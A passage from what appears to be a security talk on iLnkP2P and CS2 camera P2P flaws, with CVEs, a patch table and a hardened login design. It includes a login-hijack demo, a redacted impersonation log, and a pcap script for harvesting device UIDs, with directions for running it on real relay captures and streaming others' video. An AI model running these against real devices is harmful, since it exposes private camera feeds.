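    return hmac.new(secret, b"DEV_LGN|" + uid.encode() + b"|" + nonce, hashlib.sha256).digest()


class HardenedRendezvous:
    """Per-device secret plus a single-use server challenge: the UID alone is
    not enough to log in, and a captured login is useless a second time."""

    def __init__(self, device_secrets):
        self.secrets = device_secrets       # uid -> secret provisioned per device
        self.endpoints = {}
        self.pending = {}                   # uid -> outstanding challenge nonce

    def challenge(self, uid):
        nonce = os.urandom(16)
        self.pending[uid] = nonce
        return nonce

    def dev_login(self, uid, src_addr, nonce, tag):
        secret = self.secrets.get(uid)
        expected_nonce = self.pending.pop(uid, None)   # consumed whether or not login succeeds
        if secret is None or expected_nonce is None or nonce != expected_nonce:
            return False
        if not hmac.compare_digest(login_tag(secret, uid, nonce), tag):
            return False
        self.endpoints[uid] = src_addr
        return True

    def client_connect(self, uid):
        return self.endpoints.get(uid)


def weak_server_hijack():
    """Returns the address a client is told to punch to after the attacker logs in."""
    srv = WeakRendezvous()
    srv.dev_login(UID, DEVICE_ADDR)         # the camera's periodic login
    srv.dev_login(UID, ATTACKER_ADDR)       # attacker forges the same message
    return srv.client_connect(UID)          # the client now punches to the attacker


def hardened_server_resists():
    """Returns (forged_login_accepted, replay_accepted, address_clients_get)."""
    secret = os.urandom(32)
    srv = HardenedRendezvous({UID: secret})

    nonce = srv.challenge(UID)
    real_tag = login_tag(secret, UID, nonce)
    if not srv.dev_login(UID, DEVICE_ADDR, nonce, real_tag):
        raise RuntimeError("legitimate login should succeed")

    # Attacker knows the UID but not the secret: guesses a tag for a fresh challenge.
    nonce2 = srv.challenge(UID)
    forged = srv.dev_login(UID, ATTACKER_ADDR, nonce2, os.urandom(32))

    # Attacker replays the camera's earlier, valid login from its own address.
    replay = srv.dev_login(UID, ATTACKER_ADDR, nonce, real_tag)

    return forged, replay, srv.client_connect(UID)


if __name__ == "__main__":
    print("weak server sends clients to:", weak_server_hijack())
    print("hardened server (forged, replay, endpoint):", hardened_server_resists())
```

The important property of the hardened version is that the secret is per device. A vendor-wide key baked into every firmware image (the "CRC key" described further down the page) gives the attacker the same key the moment one device is reverse engineered, so it does not change the outcome of weak_server_hijack().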


Over-the-Internet MITM 


(Impersonation tool log, UIDs and credentials redacted: two sessions, one for a UID beginning VSTA-057541-, one for a UID beginning EEEE-000769-, ending with a captured client request of the form GET ... user.cgi?name=<redacted> ... Login)
Starting device impersonation...
Heartbeat sent to P2P servers
P2P servers requesting connection with client at 73.93.**.**:10357
P2P servers requesting connection with client at 192.168.**.**:10357
Received MSG_PUNCH_PKT from client at 73.93.**.**:10357
Received MSG_PUNCH_PKT from client at 73.93.**.**:10357
Received MSG_PUNCH_PKT from client at 73.93.**.**:10357
Received MSG_PUNCH_PKT from client at 73.93.**.**:10357
Received MSG_PUNCH_PKT from client at 73.93.**.**:10357
P2P servers requesting connection with client at 73.93.**.**:10357
P2P servers requesting connection with client at 192.168.**.**:10357

Starting device impersonation...
Heartbeat sent to P2P servers
P2P servers requesting connection with client at 73.93.**.**:10041
P2P servers requesting connection with client at 192.168.**.**:10041
Received MSG_PUNCH_PKT from client at 73.93.**.**:10041
Received MSG_PUNCH_PKT from client at 73.93.**.**:10041
Received MSG_PUNCH_PKT from client at 73.93.**.**:10041
Received MSG_PUNCH_PKT from client at 73.93.**.**:10041
Received MSG_PUNCH_PKT from client at 73.93.**.**:10041
P2P servers requesting connection with client at 73.93.**.**:10041
P2P servers requesting connection with client at 192.168.**.**:10041
Data from client (ch: 0, idx: 0): FTU1dPL...


Over-the-Internet MITM 


• CS2 sometimes "encrypts" the login message...
  • MSG_DEV_LGN_CRC instead of MSG_DEV_LGN
  • Proprietary symmetric cipher; vendor sets a "CRC key" for their P2P server
  • All their devices need to ship with that key (i.e. accessible in firmware)
  • Some servers allow logging in without the key anyway
• Affects iLnkP2P (CVE-2019-11220) and CS2 (CVE-2020-9525)
  • No response from Shenzhen Yunni
  • CS2 states new version 4.0 will fix this


Passive over-the-Internet MITM 


• Active attack requires a UID, knowledge of the protocol, timing, etc...
• Instead of targeting devices, let the devices come to us.
• Remember superdevices?
  • Devices that relay sessions for other users
  • Most vendors use these to support their network
• The P2P layer does not securely encrypt relayed traffic
  • The application traffic is typically not encrypted either...


Passive over-the-Internet MITM 


This means anyone can buy a device 


and access other people's traffic. 


Passive over-the-Internet MITM 


• With gentle PCAP parsing, can actually stream packets straight into ffplay
• Users have no way of knowing whether their connection is being intercepted
• Bonus! UIDs are leaked during the P2P handshake
  • Exploited this to collect over 236,000 unique CS2 UIDs in 10 months
• Affects iLnkP2P and CS2 (CVE-2020-9526)
  • CS2 states new version 4.0 will fix this
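The "gentle PCAP parsing" and the UID harvest both reduce to one thing: walking the UDP payloads that a superdevice relays. The block below is an added example, not the author's tooling, that does that walk with the standard library only (classic pcap global header and records, Ethernet, IPv4, UDP) and scans each payload for UID-shaped strings. The capture is constructed in memory, the UID shape (four letters, six digits, five letters) is an assumption extrapolated from the redacted prefixes in the log above, and the "DEV_LGN ..." text framing is made up for readability; real CS2 frames are binary, which is why the scan runs over raw bytes rather than decoded text.

```python
"""Harvest P2P UIDs from UDP payloads in a classic pcap (stdlib only).

Added example, not the talk's tooling. The capture below is constructed in
memory; the UID shape and the message text are assumptions (real CS2 frames
are binary). The point is the pcap/Ethernet/IPv4/UDP walk and the scan.
"""
import re
import struct
from collections import Counter

# Assumed UID shape: 4 letters - 6 digits - 5 letters (the redacted log lines
# above show only the first two groups, e.g. VSTA-057541-).
UID_RE = re.compile(rb"[A-Z]{4}-[0-9]{6}-[A-Z]{5}")

PCAP_MAGIC_LE, PCAP_MAGIC_BE = 0xA1B2C3D4, 0xD4C3B2A1


def iter_udp(pcap):
    """Yield (src_ip, sport, dst_ip, dport, payload) for each Ethernet/IPv4/UDP record."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == PCAP_MAGIC_BE:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    off = 24                                   # global header length
    while off + 16 <= len(pcap):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 14 + 20 + 8 or frame[12:14] != b"\x08\x00":
            continue                           # not IPv4 over Ethernet
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[0] >> 4 != 4 or ip[9] != 17:
            continue                           # not UDP
        total_len = struct.unpack("!H", ip[2:4])[0]
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        udp = ip[ihl:total_len]
        sport, dport, ulen = struct.unpack("!HHH", udp[:6])
        yield src, sport, dst, dport, udp[8:ulen]


def harvest_uids(pcap):
    """Count UID occurrences across all UDP payloads in the capture."""
    uids = Counter()
    for _src, _sport, _dst, _dport, payload in iter_udp(pcap):
        for match in UID_RE.findall(payload):
            uids[match.decode()] += 1
    return uids


# --- constructed capture (not real traffic) ----------------------------------
def _ip4(addr):
    return bytes(int(octet) for octet in addr.split("."))


def udp_frame(src, sport, dst, dport, payload):
    """Ethernet + IPv4 + UDP framing with zeroed MACs and checksums (enough for parsing)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     _ip4(src), _ip4(dst)) + udp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_pcap(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


SAMPLE_PCAP = build_pcap([
    udp_frame("203.0.113.10", 32100, "198.51.100.7", 10357, b"DEV_LGN ABCD-123456-EFGHI\x00"),
    udp_frame("198.51.100.7", 10357, "203.0.113.10", 32100, b"\x00\x01\x02\x03"),
    udp_frame("203.0.113.10", 32100, "198.51.100.7", 10357, b"relayed for ABCD-123456-EFGHI"),
])

if __name__ == "__main__":
    for uid, count in harvest_uids(SAMPLE_PCAP).items():
        print(uid, count)
```

Replace SAMPLE_PCAP with open("relay.pcap", "rb").read() to run it on a real capture. The same iter_udp() generator is the piece you would reuse for the ffplay trick: filter on one flow's addresses, strip the P2P framing from each payload, and write the remaining bytes to the player's stdin.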


Worry About Security?


Super Device can not spy any data it Relayed (No API for this) 


Demo time! 


Final Thoughts 


Patching

CVE             Vendor / Product   Vulnerability                 Status
CVE-2019-11219  Yunni iLnkP2P      UID enumeration               Unpatched
CVE-2019-11220  Yunni iLnkP2P      Device spoofing (MITM)        Unpatched
CVE-2020-9525   CS2 Network P2P    Device spoofing (MITM)        Patch pending (v4.0)
CVE-2020-9526   CS2 Network P2P    Data leakage in superdevice   Patch pending (v4.0)
CVE-2020-9527   Hichip             Buffer overflow               Patched (June 2020)
CVE-2020-9528   Hichip             Cryptographic weaknesses      Patched (June 2020)
CVE-2020-9529   Hichip             Password reset via LAN        Patched (June 2020)


A bleak outlook 


• No hope for some of these issues being fixed retroactively
  • Fundamental flaws with no chance of backwards compatibility
• Doesn't really matter. Users don't update -- some firmware versions go back to 2015!!
• Sellers won't pull defective products!
  • Amazon: No comment received
  • eBay: "These devices can be used safely if used in a network without an internet
    connection" [1]

1: https://www.which.co.uk/news/2020/06/more-than-100000-wireless-security-cameras-in-the-uk-at-risk-of-being-hacked/


Further research 


• More device-specific vulnerabilities exploitable through P2P
• Other P2P platforms (e.g. Wyze uses ThroughTek Kalay)
• Other large device manufacturers
• Higher up the supply chain in general!


Reversing tips 


• Samples, samples, samples!! Never too many.
• APKs: Java decompiles into beautiful, readable code (check out JADX!)
• Throw every single interesting filename or magic string you find into GitHub
  • May reveal SDKs, docs, client source, even firmware source